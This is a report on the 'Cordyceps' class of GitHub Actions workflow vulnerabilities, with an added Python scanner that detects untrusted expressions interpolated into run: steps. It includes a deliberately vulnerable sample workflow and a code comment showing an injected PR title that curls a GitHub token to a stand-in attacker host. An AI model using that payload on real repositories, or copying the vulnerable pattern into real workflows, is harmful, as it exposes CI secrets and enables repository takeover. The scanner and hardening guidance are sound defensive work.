The cybersecurity firm Novee has identified a systemic class of vulnerabilities, which it calls 'Cordyceps', in the CI/CD workflows of open source software supply chains, affecting millions of repositories. The flaws let attackers who hold no credentials on the target abuse its developer environment (the CI runner and the secrets it carries) and, in some cases, take control of the affected repository. The main issue types are command injection, authentication weaknesses, and privilege escalation, and they affect popular tools published by organizations such as Microsoft, Google, and Apache.
According to Novee, the flaws can lead to supply chain compromise: an attacker can forge approvals and exfiltrate sensitive information, such as CI secrets, without needing any special privileges. The specific vulnerabilities live in GitHub Actions YAML workflow files, but the underlying pattern is not confined to GitHub: any workflow management system that lets untrusted event data flow into workflow steps can have the same problem.
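To make the command-injection variant concrete, the following is an added example and not Novee's code or one of the Cordyceps findings; it assumes the issue takes the well-known GitHub Actions form in which a `${{ ... }}` expression carrying attacker-controlled event data (a pull request title, a branch name, an issue comment) is interpolated directly into a `run:` step, so the runner splices the attacker's text into a shell script before the shell ever parses it. The script below scans a workflow file for that pattern, using two constructed workflows: a vulnerable one and the hardened rewrite that passes the same values through environment variables, where the shell treats them as data. The list of untrusted contexts is a partial one chosen for the example, not an exhaustive catalogue.

```python
"""Detect GitHub Actions expression injection in `run:` steps.

Added example: a small line-based scanner, not an official GitHub tool.
It avoids a YAML parser so it runs with the standard library only; a
production check would parse the YAML and walk every step instead.
"""
import re

# Contexts an outside contributor controls (partial list, chosen for the example).
UNTRUSTED_PREFIXES = (
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.comment.body",
    "github.event.review.body",
    "github.event.review_comment.body",
    "github.event.discussion.title",
    "github.event.discussion.body",
    "github.event.head_commit.message",
    "github.event.head_commit.author.name",
    "github.event.head_commit.author.email",
    "github.event.commits",
    "github.event.workflow_run.head_branch",
    "github.event.workflow_run.head_commit.message",
    "github.head_ref",
    "inputs.",
    "github.event.inputs.",
)

EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
# `run: |` / `run: >` opens a block scalar; group 1 is the prefix up to `run:`.
RUN_BLOCK_RE = re.compile(r"^(\s*(?:-\s+)?)run:\s*[|>][-+]?\s*$")
# `run: echo ...` keeps the script on the same line.
RUN_INLINE_RE = re.compile(r"^\s*(?:-\s+)?run:\s*(\S.*)$")


def _is_untrusted(expr):
    """True if the expression reads a context an outsider can control."""
    return any(expr.startswith(p) for p in UNTRUSTED_PREFIXES)


def find_expression_injections(workflow_text):
    """Return [(line_number, expression)] for untrusted expressions inside run: steps."""
    findings = []
    block_indent = None  # indent of the `run:` key while inside its block scalar
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        if block_indent is not None:
            indent = len(line) - len(line.lstrip(" "))
            if line.strip() and indent <= block_indent:
                block_indent = None  # dedented: the script body has ended
            else:
                for expr in EXPR_RE.findall(line):
                    if _is_untrusted(expr):
                        findings.append((lineno, expr))
                continue
        m = RUN_BLOCK_RE.match(line)
        if m:
            block_indent = len(m.group(1))
            continue
        m = RUN_INLINE_RE.match(line)
        if m:
            for expr in EXPR_RE.findall(m.group(1)):
                if _is_untrusted(expr):
                    findings.append((lineno, expr))
    return findings


# Constructed sample: the PR title is spliced into the shell script verbatim,
# so a title like  x"; curl evil.example/$GITHUB_TOKEN; echo "  runs as the job.
VULNERABLE_WORKFLOW = """\
name: greet
on:
  pull_request_target:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - name: Echo the PR title
        run: |
          echo "Thanks for opening: ${{ github.event.pull_request.title }}"
      - run: echo "Branch ${{ github.head_ref }}"
"""

# Constructed sample: the same values reach the shell as environment variables,
# which the shell expands as data rather than parsing as code.
HARDENED_WORKFLOW = """\
name: greet
on:
  pull_request_target:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - name: Echo the PR title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
          HEAD_REF: ${{ github.head_ref }}
        run: |
          echo "Thanks for opening: $PR_TITLE"
          echo "Branch $HEAD_REF"
"""

if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, find_expression_injections(text))
```

Run against the constructed samples, the scanner reports the two interpolations in the vulnerable workflow and nothing in the hardened one. The fix it checks for is the standard one: move every attacker-influenced expression out of `run:` and into `env:`, then reference it as a quoted shell variable. Note that the scanner only covers expression injection; a `pull_request_target` workflow that checks out and executes the pull request's own code is a separate problem that this check does not detect.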